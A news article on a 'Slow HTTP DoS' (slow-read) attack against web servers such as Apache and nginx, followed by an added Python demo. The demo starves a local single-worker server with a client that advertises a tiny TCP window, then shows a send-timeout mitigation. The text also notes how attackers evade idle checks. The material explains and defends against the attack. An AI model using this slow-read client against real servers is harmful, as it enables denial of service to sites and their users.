
New Denial of Service vulnerability detailed, doesn't require many PCs


A new method for a denial of service attack against a web server has been developed which doesn't require thousands of computers in order to take a server or website down.


You have probably heard of Distributed Denial of Service (DDoS) attacks, where a massive number of computers (often hijacked ones) barrage a website with requests until it effectively shuts down. What you may not know is that there are denial of service (DoS) methods that don't need to be so distributed. So says security researcher Sergey Shekyan, who has developed a proof of concept for what he calls a "Slow HTTP DoS." The "slow" method makes an ordinary-looking HTTP request to a server, but does so in a way that causes the server to hang. As Ars Technica explains, the attacking computer reads the server's response very slowly, advertising a tiny TCP receive window, which forces the target server to keep the connection open and ties up the worker and memory assigned to it. Open enough of these connections from one machine and the server's pool of workers is exhausted, so thousands of PCs aren't needed to execute a DoS attack. Shekyan describes it with our favorite kind of analogy, the kind involving burgers:

Imagine a line at a fast food restaurant that serves two types of burgers, and a customer at the cashier is stuck for a while deciding what he wants to order, making the rest of the line anxious, slowing down the business. Now imagine a line at the same restaurant, but with a sign saying "think ahead of your order," which is supposed to speed things up. But now the customer orders hundreds of burgers, pays, and the line is stuck again, because he can take only 5 burgers at a time to his car, making signs ineffective.

The bad news, Shekyan says, is that the default configurations of popular web server software like Apache, nginx, and lighttpd are all vulnerable. However, there are steps that server administrators can take to minimize exposure, such as limiting how long a connection may take to read a response and how many connections a single client may hold open, and for now it's just a proof of concept, not an attack seen in the wild.
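To make the mechanism concrete, here is an added example that is not part of the original article and is not Shekyan's tool. It is a self-contained Python script that starts a single-worker HTTP server on localhost, connects a client that shrinks its TCP receive buffer and then never reads the response, and checks whether a normal client can still get served. A second run applies the kind of mitigation the article alludes to, a per-connection send timeout on the server, so the slow reader is dropped and the normal client gets through. All names, the 32 MiB response size and the timeout values are choices made for this example.

```python
import socket
import threading
import time
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed response body: big enough to overflow the kernel socket buffers
# on loopback, so the server cannot finish sending until the client reads.
PAYLOAD = b"x" * (32 * 1024 * 1024)


class BigResponseHandler(BaseHTTPRequestHandler):
    # socketserver applies this attribute as the connection socket timeout.
    # None reproduces a server that will wait forever for a slow reader.
    timeout = None

    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-Type", "application/octet-stream")
        self.send_header("Content-Length", str(len(PAYLOAD)))
        self.end_headers()
        self.wfile.write(PAYLOAD)  # blocks while the client's window stays full

    def log_message(self, *args):
        pass  # keep the demo quiet


class QuietServer(HTTPServer):
    # HTTPServer is single-threaded: one stalled connection is a stalled server.
    def handle_error(self, request, client_address):
        pass  # resets from clients that close early are expected in this demo


def start_server(send_timeout):
    """Start a server whose connections time out after send_timeout seconds (None = never)."""
    handler = type("Handler", (BigResponseHandler,), {"timeout": send_timeout})
    server = QuietServer(("127.0.0.1", 0), handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def open_slow_reader(port):
    """Attacker side: a tiny receive buffer (hence a tiny advertised TCP window),
    a normal-looking request, and then no reads at all."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 1024)  # must precede connect
    sock.connect(("127.0.0.1", port))
    sock.sendall(b"GET / HTTP/1.1\r\nHost: localhost\r\n\r\n")
    return sock


def normal_client_gets_response(port, timeout):
    """Victim side: a well-behaved client; True if a status line arrives in time."""
    sock = socket.create_connection(("127.0.0.1", port), timeout=timeout)
    try:
        sock.sendall(b"GET / HTTP/1.1\r\nHost: localhost\r\n\r\n")
        return sock.recv(64).startswith(b"HTTP/1.0 200")
    except socket.timeout:
        return False
    finally:
        sock.close()


def probe(server_send_timeout, victim_timeout):
    """Run one scenario and report whether a normal client still gets served."""
    server = start_server(server_send_timeout)
    port = server.server_address[1]
    slow = open_slow_reader(port)
    try:
        time.sleep(0.5)  # let the server accept the slow reader and start writing
        return normal_client_gets_response(port, victim_timeout)
    finally:
        slow.close()  # the reset this causes unblocks the server's pending write
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print("default server, normal client served:", probe(None, 2.0))  # False
    print("1s send timeout, normal client served:", probe(1.0, 6.0))  # True
```

The slow reader here never reads at all; a real attacker would read a byte every few seconds so that the connection never looks idle to a naive check, which is why the mitigation is a bound on the total time a response may take rather than a timeout between individual writes. Production servers run many workers, so a real attack needs proportionally more of these connections, but each one is as cheap as the single socket opened above.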